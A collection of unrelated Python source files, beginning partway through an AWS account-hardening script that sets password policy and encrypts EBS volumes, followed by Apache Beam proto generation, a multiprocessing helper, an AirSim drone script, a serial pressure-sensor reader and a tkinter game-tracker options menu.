print("> Require Lowercase : {}".format(rq_lower))
print("> Password History : Last {}".format(pass_history))
print("> Password Age : {} days".format(pass_age))
if not non_interactive:
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
if opt == "y" or opt == "":
sys.stdout.write("Setting up password policy... ")
sys.stdout.flush()
iam = session.client('iam')
iresp = iam.update_account_password_policy(
MinimumPasswordLength=pass_length,
RequireSymbols=rq_symbol,
RequireNumbers=rq_num,
RequireUppercaseCharacters=rq_upper,
RequireLowercaseCharacters=rq_lower,
MaxPasswordAge=pass_age,
PasswordReusePrevention=pass_history
)
print("Ok")
else:
print("Skipping password policy setup")
return True
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def enable_ebs_sse(session, non_interactive, instance_ids=None, volume_ids=None, kms_id=None):
"""
This will enable server-side encryption on EBS volumes
"""
opt = ""
try:
print("\n====================================")
print("Encrypting EBS Volumes")
print("====================================")
print("!!!WARNING!!!\nThis results in downtime if volume is attached to an instance.")
if not non_interactive:
vm_ids = str.lower(str.strip(input("\nEnter instance id(s)(comma separated): ")))
vol_ids = str.lower(str.strip(input("Enter volume id(s)(comma separated): ")))
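            # heuristic: real EC2 instance/volume ids are longer than 10 characters,
            # so anything shorter is treated as "not provided"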
if len(vm_ids) < 10 and len(vol_ids) < 10:
print("Either instance id or volume id is required.")
return False
if len(vm_ids) > 10:
instance_ids = tuple(str(s).strip(", ") for s in vm_ids.strip(", ").split(","))
if len(vol_ids) > 10:
volume_ids = tuple(str(s).strip(", ") for s in vol_ids.strip(", ").split(","))
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
if opt == "y" or opt == "":
ec2 = session.client('ec2')
final_list = {}
params = {}
if instance_ids != None and len(instance_ids) > 0:
params['Filters'] = [
{
'Name': 'attachment.instance-id',
'Values': list(instance_ids)
}
]
while True:
resp = ec2.describe_volumes(**params)
for volume in resp['Volumes']:
unique = True
if volume['Attachments'][0]['InstanceId'] not in final_list:
final_list[volume['Attachments'][0]['InstanceId']] = []
else:
for vol in final_list[volume['Attachments'][0]['InstanceId']]:
if volume['VolumeId'] == vol['VolumeId']:
unique = False
break
if unique:
tmp = {
'VolumeId': volume['VolumeId'],
'Encrypted': volume['Encrypted'],
'MountPath': volume['Attachments'][0]['Device'],
'AZ': volume['AvailabilityZone'],
'VolumeType': volume['VolumeType']
}
if 'Iops' in volume:
tmp['Iops'] = volume['Iops']
if 'Tags' in volume:
tmp['Tags'] = volume['Tags']
final_list[volume['Attachments'][0]['InstanceId']].append(tmp)
try:
params['NextToken'] = resp['NextToken']
except:
break
params = {}
if volume_ids != None and len(volume_ids) > 0:
params['VolumeIds'] = list(volume_ids)
while True:
resp = ec2.describe_volumes(**params)
for volume in resp['Volumes']:
vm_id = 'null' if len(volume['Attachments']) == 0 else volume['Attachments'][0]['InstanceId']
unique = True
if vm_id not in final_list:
final_list[vm_id] = []
else:
for vol in final_list[vm_id]:
if volume['VolumeId'] == vol['VolumeId']:
unique = False
break
if unique:
tmp = {
'VolumeId': volume['VolumeId'],
'Encrypted': volume['Encrypted'],
'AZ': volume['AvailabilityZone'],
'VolumeType': volume['VolumeType']
}
if 'Iops' in volume:
tmp['Iops'] = volume['Iops']
if 'Tags' in volume:
tmp['Tags'] = volume['Tags']
if len(volume['Attachments']) != 0:
tmp['MountPath'] = volume['Attachments'][0]['Device']
final_list[vm_id].append(tmp)
try:
params['NextToken'] = resp['NextToken']
except:
break
manage_ebs_encryption(session, final_list, kms_id)
else:
print("Skipping EBS Volume Encryption")
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def manage_ebs_encryption(session, volume_list, kms_id):
# print(volume_list)
for vmid in volume_list:
if vmid != "null":
print("Starting encryption process for volume(s) belonging to instance {}".format(vmid))
stop_instance(session, vmid)
threads = []
for vol in volume_list[vmid]:
t = threading.Thread(target=start_sse_process, args=(session,vmid,vol,kms_id,))
threads.append(t)
t.start()
for t in threads:
t.join()
if vmid != "null":
print("Volume(s) belonging to instance {} were successfully encrypted".format(vmid))
start_instance(session, vmid)
def start_sse_process(session, vmid, vol, kms_id):
if vol['Encrypted'] == True:
print("Volume {} is already encrypted. Skipping encryption process.".format(vol['VolumeId']))
return False
else:
print("Starting encryption of volume {}".format(vol['VolumeId']))
# Step 1: Create snapshot
old_snap_id = create_snapshot(session, vol['VolumeId'])
if old_snap_id == False:
print("Snapshot creation failed for volume {}".format(vol['VolumeId']))
return False
# Step 2: Clone snapshot with encryption
if kms_id == None or len(kms_id) == 0:
new_snap_id = clone_snapshot(session, old_snap_id)
else:
new_snap_id = clone_snapshot(session, old_snap_id, common.prepare_kms_key(session, kms_id))
if new_snap_id == False:
print("Snapshot encryption failed for snapshot {}".format(old_snap_id))
return False
# Step 3: Create new encrypted volume from cloned snapshot
        # use .get('Iops') because volumes without provisioned IOPS may not report an Iops value
        if 'Tags' in vol:
            new_vol_id = create_volume(session, new_snap_id, vol['AZ'], vol['VolumeType'], vol.get('Iops'), vol['Tags'])
        else:
            new_vol_id = create_volume(session, new_snap_id, vol['AZ'], vol['VolumeType'], vol.get('Iops'))
if new_vol_id == False:
print("Failed to create encrypted volume {}".format(new_vol_id))
return False
# Step 4: Attach encrypted volume to instance if applicable
if vmid != "null":
if not attach_to_vm(session, vol['VolumeId'], vmid, new_vol_id, vol['MountPath']):
print("Failed to attach encrypted volume {} to instance {}".format(new_vol_id, vmid))
return False
# Step 5: Clean unwanted resources
if not clean_resources(session, vol['VolumeId'], old_snap_id, new_snap_id):
print("Failed to delete resources: {} {} {}".format(old_snap_id, new_snap_id, vol['VolumeId']))
return False
return True
def stop_instance(session, vm_id):
try:
ec2 = session.client('ec2')
print("Stopping instance {}...".format(vm_id))
ec2.stop_instances(
InstanceIds=[
vm_id
]
)
total_time = 0
while True:
resp = ec2.describe_instances(
InstanceIds=[
vm_id
]
)
if resp['Reservations'][0]['Instances'][0]['State']['Name'] == 'stopped':
print("Successfuly stopped instance {}".format(vm_id))
return True
time.sleep(5)
total_time = total_time + 5
print('Still stopping instance {}... {}s'.format(vm_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def create_snapshot(session, vol_id):
try:
ec2 = session.client('ec2')
print("Creating snapshot of volume {}...".format(vol_id))
resp = ec2.create_snapshot(
VolumeId=vol_id,
Description='Unencrypted snapshot of {}'.format(vol_id)
)
snap_id = resp['SnapshotId']
total_time = 0
while True:
resp = ec2.describe_snapshots(
SnapshotIds=[
snap_id
]
)
if resp['Snapshots'][0]['State'] == 'completed':
print("Successfully created snaphost {} of volume {}".format(snap_id, vol_id))
return snap_id
time.sleep(5)
total_time = total_time + 5
print('Still creating snapshot {}... {}s'.format(snap_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def clone_snapshot(session, snap_id, kms_id="alias/aws/ebs"):
try:
ec2 = session.client('ec2')
print("Encrypting snapshot {}...".format(snap_id))
resp = ec2.copy_snapshot(
SourceSnapshotId=snap_id,
            Description='Encrypted snapshot of {}'.format(snap_id),
Encrypted=True,
KmsKeyId=kms_id,
SourceRegion=session.region_name
)
new_snap_id = resp['SnapshotId']
total_time = 0
while True:
resp = ec2.describe_snapshots(
SnapshotIds=[
new_snap_id
]
)
if resp['Snapshots'][0]['State'] == 'completed':
print("Successfully created encrypted snaphost {}".format(new_snap_id))
return new_snap_id
time.sleep(5)
total_time = total_time + 5
print('Still encrypting snapshot {}... {}s'.format(snap_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def create_volume(session, new_snap_id, az, vol_type, iops, tags=None):
try:
ec2 = session.client('ec2')
args = {
'AvailabilityZone': az,
'SnapshotId': new_snap_id,
'VolumeType': vol_type
}
if tags != None:
args['TagSpecifications'] = [
{
'ResourceType': 'volume',
'Tags': tags
}
]
if vol_type == 'io1':
args['Iops'] = iops
print("Creating encrypted volume from snapshot {}...".format(new_snap_id))
resp = ec2.create_volume(**args)
new_vol_id = resp['VolumeId']
total_time = 0
while True:
resp = ec2.describe_volumes(
VolumeIds=[
new_vol_id
]
)
if resp['Volumes'][0]['State'] == 'available':
print("Successfully created encrypted volume {} from snapshot {}...".format(new_vol_id, new_snap_id))
return new_vol_id
time.sleep(5)
total_time = total_time + 5
print('Still creating new volume {}... {}s'.format(new_vol_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def attach_to_vm(session, old_vol_id, vm_id, new_vol_id, mount_path):
try:
ec2 = session.client('ec2')
# Detach old volume
print("Detaching old volume {} from instance {}...".format(old_vol_id, vm_id))
ec2.detach_volume(
VolumeId=old_vol_id,
Force=True
)
total_time = 0
while True:
resp = ec2.describe_volumes(
VolumeIds=[
old_vol_id
]
)
if resp['Volumes'][0]['State'] == 'available':
print("Successfully detached old volume {} from instance {}".format(old_vol_id, vm_id))
break
time.sleep(5)
total_time = total_time + 5
print('Still detaching old volume {} from instance {}... {}s'.format(old_vol_id, vm_id, total_time))
# Attach new volume
print("Attching encrypted volume {} to instance {}...".format(new_vol_id, vm_id))
ec2.attach_volume(
InstanceId=vm_id,
VolumeId=new_vol_id,
Device=mount_path
)
total_time = 0
while True:
resp = ec2.describe_volumes(
VolumeIds=[
new_vol_id
]
)
if resp['Volumes'][0]['State'] == 'in-use':
print("Successfully attched encrypted volume {} to instance {}".format(new_vol_id, vm_id))
return True
time.sleep(5)
total_time = total_time + 5
print('Still attaching encrypted volume {} to instance {}... {}s'.format(new_vol_id, vm_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def start_instance(session, vm_id):
try:
ec2 = session.client('ec2')
print('Starting back instance {}...'.format(vm_id))
ec2.start_instances(
InstanceIds=[
vm_id
]
)
total_time = 0
while True:
resp = ec2.describe_instances(
InstanceIds=[
vm_id
]
)
if resp['Reservations'][0]['Instances'][0]['State']['Name'] == 'running':
print('Successfully started instance {}'.format(vm_id))
return True
time.sleep(5)
total_time = total_time + 5
print('Still starting instance {}... {}s'.format(vm_id, total_time))
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def clean_resources(session, old_vol_id, old_snap_id, new_snap_id):
try:
ec2 = session.client('ec2')
# Deleting old snapshot
ec2.delete_snapshot(
SnapshotId=old_snap_id
)
# Deleting new snapshot
ec2.delete_snapshot(
SnapshotId=new_snap_id
)
# Deleting old volume
ec2.delete_volume(
VolumeId=old_vol_id
)
return True
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
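# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# Assumes boto3 is installed, AWS credentials/region are configured locally, and the
# secureaws package is importable; the service list below is only an example.
if __name__ == "__main__":
    import boto3
    demo_session = boto3.Session()
    # Interactive menu:
    secure_account_menu(demo_session)
    # Or a scripted, non-interactive run of selected services:
    # secure_account(demo_session, svc=["cloudtrail", "config"], non_interactive=True)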
|
gen_protos.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Generates Python proto modules and grpc stubs for Beam protos."""
from __future__ import absolute_import
from __future__ import print_function
import glob
import logging
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import time
import warnings
import pkg_resources
BEAM_PROTO_PATHS = [
os.path.join('..', '..', 'model', 'pipeline', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'job-management', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'fn-execution', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'interactive', 'src', 'main', 'proto'),
]
PYTHON_OUTPUT_PATH = os.path.join('apache_beam', 'portability', 'api')
MODEL_RESOURCES = [
os.path.normpath('../../model/fn-execution/src/main/resources'\
+ '/org/apache/beam/model/fnexecution/v1/standard_coders.yaml'),
]
def generate_proto_files(force=False, log=None):
try:
import grpc_tools # pylint: disable=unused-import
except ImportError:
warnings.warn('Installing grpcio-tools is recommended for development.')
if log is None:
log = logging.getLogger(__name__)
py_sdk_root = os.path.dirname(os.path.abspath(__file__))
common = os.path.join(py_sdk_root, '..', 'common')
proto_dirs = [os.path.join(py_sdk_root, path) for path in BEAM_PROTO_PATHS]
proto_files = sum(
[glob.glob(os.path.join(d, '*.proto')) for d in proto_dirs], [])
out_dir = os.path.join(py_sdk_root, PYTHON_OUTPUT_PATH)
out_files = [path for path in glob.glob(os.path.join(out_dir, '*_pb2.py'))]
if out_files and not proto_files and not force:
# We have out_files but no protos; assume they're up to date.
# This is actually the common case (e.g. installation from an sdist).
log.info('No proto files; using existing generated files.')
return
elif not out_files and not proto_files:
if not os.path.exists(common):
raise RuntimeError(
'Not in apache git tree; unable to find proto definitions.')
else:
raise RuntimeError(
'No proto files found in %s.' % proto_dirs)
if force:
regenerate = 'forced'
elif not out_files:
regenerate = 'no output files'
elif len(out_files) < len(proto_files):
regenerate = 'not enough output files'
elif (
min(os.path.getmtime(path) for path in out_files)
<= max(os.path.getmtime(path)
for path in proto_files + [os.path.realpath(__file__)])):
regenerate = 'output files are out-of-date'
elif len(out_files) > len(proto_files):
regenerate = 'output files without corresponding .proto files'
# too many output files: probably due to switching between git branches.
# remove them so they don't trigger constant regeneration.
for out_file in out_files:
os.remove(out_file)
else:
regenerate = None
if regenerate:
try:
from grpc_tools import protoc
except ImportError:
if platform.system() == 'Windows':
# For Windows, grpcio-tools has to be installed manually.
raise RuntimeError(
'Cannot generate protos for Windows since grpcio-tools package is '
'not installed. Please install this package manually '
'using \'pip install grpcio-tools\'.')
# Use a subprocess to avoid messing with this process' path and imports.
# Note that this requires a separate module from setup.py for Windows:
# https://docs.python.org/2/library/multiprocessing.html#windows
p = multiprocessing.Process(
target=_install_grpcio_tools_and_generate_proto_files)
p.start()
p.join()
if p.exitcode:
raise ValueError("Proto generation failed (see log for details).")
else:
log.info('Regenerating Python proto definitions (%s).' % regenerate)
builtin_protos = pkg_resources.resource_filename('grpc_tools', '_proto')
args = (
[sys.executable] + # expecting to be called from command line
['--proto_path=%s' % builtin_protos] +
['--proto_path=%s' % d for d in proto_dirs] +
['--python_out=%s' % out_dir] +
# TODO(robertwb): Remove the prefix once it's the default.
['--grpc_python_out=grpc_2_0:%s' % out_dir] +
proto_files)
ret_code = protoc.main(args)
if ret_code:
raise RuntimeError(
'Protoc returned non-zero status (see logs for details): '
'%s' % ret_code)
# copy resource files
for path in MODEL_RESOURCES:
shutil.copy2(os.path.join(py_sdk_root, path), out_dir)
ret_code = subprocess.call(["pip", "install", "future==0.16.0"])
if ret_code:
raise RuntimeError(
'Error installing future during proto generation')
ret_code = subprocess.call(
["futurize", "--both-stages", "--write", "--no-diff", out_dir])
if ret_code:
raise RuntimeError(
'Error applying futurize to generated protobuf python files.')
# Though wheels are available for grpcio-tools, setup_requires uses
# easy_install which doesn't understand them. This means that it is
# compiled from scratch (which is expensive as it compiles the full
# protoc compiler). Instead, we attempt to install a wheel in a temporary
# directory and add it to the path as needed.
# See https://github.com/pypa/setuptools/issues/377
def _install_grpcio_tools_and_generate_proto_files():
py_sdk_root = os.path.dirname(os.path.abspath(__file__))
install_path = os.path.join(py_sdk_root, '.eggs', 'grpcio-wheels')
build_path = install_path + '-build'
if os.path.exists(build_path):
shutil.rmtree(build_path)
logging.warning('Installing grpcio-tools into %s', install_path)
try:
start = time.time()
subprocess.check_call(
[sys.executable, '-m', 'pip', 'install',
'--target', install_path, '--build', build_path,
'--upgrade',
'-r', os.path.join(py_sdk_root, 'build-requirements.txt')])
logging.warning(
'Installing grpcio-tools took %0.2f seconds.', time.time() - start)
finally:
sys.stderr.flush()
shutil.rmtree(build_path, ignore_errors=True)
sys.path.append(install_path)
try:
generate_proto_files()
finally:
sys.stderr.flush()
if __name__ == '__main__':
generate_proto_files(force=True)
|
multiprocessing_tools.py
|
import multiprocessing
def fun(f, q_in, q_out):
while True:
i, x = q_in.get()
if i is None:
break
q_out.put((i, f(x)))
def parmap(f, X, nprocs=multiprocessing.cpu_count()):
q_in = multiprocessing.Queue(1)
q_out = multiprocessing.Queue()
proc = [multiprocessing.Process(target=fun, args=(f, q_in, q_out))
for _ in range(nprocs)]
for p in proc:
p.daemon = True
p.start()
sent = [q_in.put((i, x)) for i, x in enumerate(X)]
[q_in.put((None, None)) for _ in range(nprocs)]
res = [q_out.get() for _ in range(len(sent))]
[p.join() for p in proc]
return [x for i, x in sorted(res)]
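# Minimal usage sketch (added for illustration): parmap applies a picklable function to each
# element of an iterable in worker processes and returns the results in input order.
if __name__ == '__main__':
    import math
    print(parmap(math.sqrt, [1, 4, 9, 16], nprocs=2))  # -> [1.0, 2.0, 3.0, 4.0]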
|
multirotor_autonomous.py
|
"""
For connecting to the AirSim drone environment and testing API functionality
And to learn how to control the drone
"""
import setup_path
import airsim
import numpy as np
import os
import tempfile
import pprint
import json
import cv2
import sys
import time
import threading
# connect to the AirSim simulator
client = airsim.MultirotorClient(ip="127.0.0.1")
client.confirmConnection()
client.enableApiControl(True)
client.armDisarm(True)
state = client.getMultirotorState()
position_global_ref = state.gps_location #gps location where the multirotor takes off
# airsim.wait_key('Press any key to takeoff')
# client.takeoffAsync().join()
client.moveToPositionAsync(0, 0, -10, 5).join()
state = client.getMultirotorState()
position_local = state.kinematics_estimated.position
print("state: %s" % pprint.pformat(position_local))
position_local = state.kinematics_estimated.position
attitude_q = state.kinematics_estimated.orientation  # orientation quaternion
position_global = state.gps_location
mutex = threading.Lock()
def showImages():
global mutex, client
cameraType = "scene"
cameraTypeMap = {
"depth": airsim.ImageType.DepthVis,
"segmentation": airsim.ImageType.Segmentation,
"seg": airsim.ImageType.Segmentation,
"scene": airsim.ImageType.Scene,
"disparity": airsim.ImageType.DisparityNormalized,
"normals": airsim.ImageType.SurfaceNormals
}
print (cameraTypeMap[cameraType])
help = False
fontFace = cv2.FONT_HERSHEY_SIMPLEX
fontScale = 0.5
thickness = 2
textSize, baseline = cv2.getTextSize("FPS", fontFace, fontScale, thickness)
print (textSize)
textOrg = (10, 10 + textSize[1])
frameCount = 0
    startTime = time.perf_counter()  # time.clock() was removed in Python 3.8
fps = 0
i = 0
while True:
        #client.moveByVelocityAsync(1,0,0,100)  # .join() blocks until the call finishes; without it the call is asynchronous
# because this method returns std::vector<uint8>, msgpack decides to encode it as a string unfortunately.
if mutex.acquire():
rawImage = client.simGetImage("0", cameraTypeMap[cameraType])
mutex.release()
            if rawImage is None:
print("Camera is not returning image, please check airsim for error messages")
sys.exit(0)
else:
png = cv2.imdecode(airsim.string_to_uint8_array(rawImage), cv2.IMREAD_UNCHANGED)
cv2.putText(png,'FPS ' + str(fps),textOrg, fontFace, fontScale,(255,0,255),thickness)
cv2.imshow("Scene", png)
frameCount = frameCount + 1
                endTime = time.perf_counter()
diff = endTime - startTime
if (diff > 1):
fps = frameCount
frameCount = 0
startTime = endTime
time.sleep(0.01)
        key = cv2.waitKey(1) & 0xFF
if (key == 27 or key == ord('q') or key == ord('x')):
break
def moveDrone():
global mutex, client
while True:
if mutex.acquire():
client.moveByVelocityAsync(3,0,0,5)
mutex.release()
time.sleep(0.01)
        key = cv2.waitKey(1) & 0xFF
if (key == 27 or key == ord('q') or key == ord('x')):
break
threads = []
t1 = threading.Thread(target=moveDrone)
threads.append(t1)
t2 = threading.Thread(target=showImages)
threads.append(t2)
if __name__ == '__main__':
#airsim.wait_key('Press any key to reset to original state')
    for t in threads:
        t.daemon = True  # setDaemon() is deprecated
        t.start()
    # join only after every thread has started so drone control and image display run concurrently
    for t in threads:
        t.join()
client.armDisarm(False)
client.reset()
# that's enough fun for now. let's quit cleanly
client.enableApiControl(False)
|
softskin.py
|
import serial
import serial.tools.list_ports
import numpy as np
import math
import threading
import re
import os
import sys
import time
import matplotlib.pyplot as plt
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
data_path = os.path.abspath(
os.path.dirname(os.path.abspath(__file__)) + os.path.sep + ".." +
os.path.sep + "data")
def print_serial(port):
print("---------------[ %s ]---------------" % port.name)
print("Path: %s" % port.device)
print("Descript: %s" % port.description)
print("HWID: %s" % port.hwid)
    if port.manufacturer is not None:
        print("Manufacturer: %s" % port.manufacturer)
    if port.product is not None:
        print("Product: %s" % port.product)
    if port.interface is not None:
        print("Interface: %s" % port.interface)
print()
def detect_serials(location="1-1.1:1.0", vid=0x10c4, pid=0xea60):
    # Looks for a serial port whose USB location matches `location`.
    # The vid/pid defaults (0x10c4:0xea60, a Silicon Labs CP210x UART bridge) are kept for
    # reference but are not used by the matching logic below.
    ports = serial.tools.list_ports.comports()
    for port in ports:
        print_serial(port)
        if port.location and location in port.location:
            return port.device
    print("Cannot find the target device: %s" % location)
    return None
class SoftSkin(object):
def __init__(self):
port_name = detect_serials() # Arduino Mega 2560 ttyACM0
baud_rate = 115200
print(port_name, baud_rate)
self.pwd = os.path.abspath(os.path.abspath(__file__))
self.father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
self.serial = serial.Serial(port_name, baud_rate, timeout=None)
        self.raw_data = []  # holds one frame of sensor data
        self.base_data = []  # baseline values collected during initialization
self.temp_data = []
self.port_num = 32
self.average_length = 10
self.average_buffer = np.zeros((self.average_length,self.port_num))
self.max_pressure = 0
self.build_base_line_data()
pass
def read_data(self, is_shown=1):
try:
one_line_data = self.serial.readline().decode("utf-8")
# print(one_line_data)
one_line_data = one_line_data.strip('SS')
one_line_data = one_line_data.strip('\n')
one_line_data = one_line_data.strip('\r')
one_line_data = one_line_data.split('|')
# print(one_line_data)
if is_shown == 1:
print(one_line_data)
if len(one_line_data) == self.port_num:
one_line_data = list(map(float, one_line_data))
one_line_data = list(map(int, one_line_data))
self.raw_data = one_line_data
# print(self.raw_data, type(self.raw_data), type(self.raw_data[0]))
except BaseException as be:
print("Data Error:", be)
def build_base_line_data(self, initial_size=20):
"""
1.建立一组基准数值
检测异常值
取平均值
:return:
"""
base_list = []
for i in range(initial_size):
# time.sleep(0.01)
# self.serial.flushInput()
self.read_data(0)
if len(self.raw_data) == self.port_num:
# print(self.raw_data)
temp_raw_data = self.raw_data
base_list += temp_raw_data
mean_base_list = np.array(base_list).reshape([-1, self.port_num])
add_col = np.ones(mean_base_list.shape[0]).reshape([1, -1])
mean_base_list = add_col.dot(mean_base_list) / mean_base_list.shape[0]
self.base_data = mean_base_list.tolist()[0]
# print(self.base_data)
self.base_data = list(map(lambda x: int(x) - 1, self.base_data))
# print(self.base_data, type(self.base_data))
print("base line data: ", self.base_data)
pass
def read_and_record(self, record=False, show=False, plot=False, plot_num=30,):
file_path = data_path + os.path.sep + "Softskin.txt"
plot_array = np.zeros((plot_num, self.port_num))
if record:
file = open(file_path, 'w')
while True:
try:
# self.serial.flushInput()
self.read_data(0)
if len(self.raw_data) == len(self.base_data):
temp_data = np.array(self.raw_data) - np.array(self.base_data)
if show:
print(temp_data)
print(self.max_pressure)
if record:
time_index = time.time()
write_data = temp_data.tolist()
write_data.insert(0, time_index)
file.write(str(write_data) + '\n')
file.flush()
self.temp_data = temp_data
self.max_pressure = max(self.temp_data)
time.sleep(0.1)
if plot:
# plt.ion()
plot_array[0:plot_num - 1, :] = plot_array[1:plot_num, :]
plot_array[plot_num - 1, :] = np.array(temp_data)
plt.clf()
plt.xlabel('Time')
plt.ylabel('pressure')
plt.ylim((-10, 270))
plt.plot(range(0, plot_num), plot_array)
# plt.ioff()
# plt.show()
# plt.draw()
plt.pause(0.0000000001)
except BaseException as be:
print("Data Error:", be)
if __name__ == '__main__':
from Driver import ControlOdometryDriver as CD
softskin = SoftSkin()
softskin.build_base_line_data()
# while True:
# softskin.read_data(0)
# print(np.array(softskin.raw_data) - np.array(softskin.base_data))
def little_test(sk:SoftSkin, driver:CD.ControlDriver):
while True:
# print(sk.max_pressure)
# if sk.max_pressure>=70:
# driver.speed = 0
# time.sleep(5)
# driver.speed = 0.3
# time.sleep(0.5)
driver.speed = 0.3
time.sleep(3)
driver.speed = 0
time.sleep(3)
driver = CD.ControlDriver(left_right=0)
thread_test = threading.Thread(target=little_test,args=(softskin,driver,))
thread_test.start()
# driver.start()
softskin.read_and_record(show=True, record=True,plot=False)
# softskin.record_label()
|
option_picker.py
|
import traceback
from tkinter import *
from multiprocessing import Queue
from queue import Empty as QueueEmpty
from tkinter.colorchooser import askcolor
import json
import re
import tkinter.ttk
import pygame.sysfont
from options import Options
import logging
import urllib.request, urllib.error, urllib.parse
import webbrowser
import platform
import threading
from error_stuff import log_error
class OptionsMenu(object):
"""
These are the standard save and load options functions.
"""
def __init__(self):
self.options = Options()
self.root = Tk()
self.root.destroy()
# Our 'safe' list of fonts that should work in pygame
self.fonts = ['Andalus', 'Angsana New', 'AngsanaUPC', 'Arial', 'Arial Black', 'Browallia New', 'BrowalliaUPC',
'Comic Sans MS', 'Cordia New', 'CordiaUPC', 'Courier New', 'DFKai-SB', 'David', 'DilleniaUPC',
'Estrangelo Edessa', 'FrankRuehl', 'Franklin Gothic Medium', 'Gautami', 'Georgia', 'Impact',
'IrisUPC', 'JasmineUPC', 'KodchiangUPC', 'Latha', 'LilyUPC', 'Lucida Console', 'MV Boli',
'Mangal', 'Microsoft Sans Serif', 'Miriam', 'Miriam Fixed', 'Narkisim', 'Raavi', 'Rod', 'Shruti',
'SimHei', 'Simplified Arabic', 'Simplified Arabic Fixed', 'Sylfaen', 'Tahoma', 'Times New Roman',
'Traditional Arabic', 'Trebuchet MS', 'Tunga', 'Verdana']
self.game_versions = ['Rebirth', 'Afterbirth', 'Afterbirth+', 'Repentance', 'Antibirth']
self.network_queue = Queue()
# Check if the system has the fonts installed, and remove them from the list if it doesn't
try:
valid_pygame_fonts = [str.lower(x.replace(" ", "")) for x in self.fonts]
system_fonts = pygame.sysfont.get_fonts()
to_delete = []
for index, font in enumerate(valid_pygame_fonts):
if font not in system_fonts:
to_delete += [index]
for index in to_delete[::-1]:
del self.fonts[index]
        except Exception:
            log_error("There may have been an error detecting system fonts.\n" + traceback.format_exc())
pretty_name_map = {"read_from_server": "Watch Someone Else",
"write_to_server": "Let Others Watch Me",
"twitch_name": "Their Twitch Name",
"bold_font": "Bold",
"blck_cndl_mode": "BLCK CNDL Mode",
"custom_title_enabled": "Change Window Title",
"log_file_check_seconds": "Check log file every",
"show_jacob_esau_items": "Show Jacob&Esau Icons"}
label_after_text = {"message_duration":"second(s)",
"framerate_limit":"fps",
"log_file_check_seconds": "second(s)"}
connection_labels = {"starting":"Connecting to server for player list...",
"done": "Connecting to server for player list... Done",
"fail": "Connecting to server for player list... Failed"}
def pretty_name(self, s):
# Change from a var name to something you'd show the users
if s in self.pretty_name_map:
return self.pretty_name_map.get(s)
return " ".join(s.split("_")).title()
def color_callback(self, source):
# Prompt a color picker, set the options and the background/foreground of the button
nums, hex_color = askcolor(color=getattr(self.options, source), title="Color Chooser")
if hex_color:
opposite = self.opposite_color(hex_color)
setattr(self.options, source, hex_color.upper())
self.buttons[source].configure(bg=hex_color, fg=opposite)
def checkbox_callback(self):
# Just for the "show decription" checkbox -- to disable the message duration entry
if not self.checks.get("show_description").get():
self.entries["message_duration"].configure(state=DISABLED)
else:
self.entries["message_duration"].configure(state=NORMAL)
# Disable custom message if we don't have to show it
if not self.checks.get("show_status_message").get():
self.entries["status_message"].configure(state=DISABLED)
else:
self.entries["status_message"].configure(state=NORMAL)
# Just for the "Custom Title Enabled" checkbox -- to disable the "Custom Title" entry
if not self.checks.get("custom_title_enabled").get():
self.entries["custom_title"].configure(state=DISABLED)
else:
self.entries["custom_title"].configure(state=NORMAL)
# Writing to server occurs when state changes, so enable read delay if we are reading
if self.checks.get("read_from_server").get():
self.entries["read_delay"].grid()
self.entries["twitch_name"].grid()
self.labels["read_delay"].grid()
self.labels["twitch_name"].grid()
else:
self.entries["read_delay"].grid_remove()
self.entries["twitch_name"].grid_remove()
self.labels["read_delay"].grid_remove()
self.labels["twitch_name"].grid_remove()
self.labels["server_connect_label"].config(text="")
if self.checks.get("change_server").get():
self.entries["trackerserver_url"].grid()
self.labels["trackerserver_url"].grid()
else:
self.entries["trackerserver_url"].grid_remove()
self.labels["trackerserver_url"].grid_remove()
# Disable authkey if we don't write to server
if self.checks.get("write_to_server").get():
self.entries["trackerserver_authkey"].grid()
self.labels["trackerserver_authkey"].grid()
self.buttons["authkey_button"].grid()
else:
self.entries["trackerserver_authkey"].grid_remove()
self.labels["trackerserver_authkey"].grid_remove()
self.buttons["authkey_button"].grid_remove()
def read_callback(self):
if self.checks.get("read_from_server").get():
self.checks.get("write_to_server").set(0)
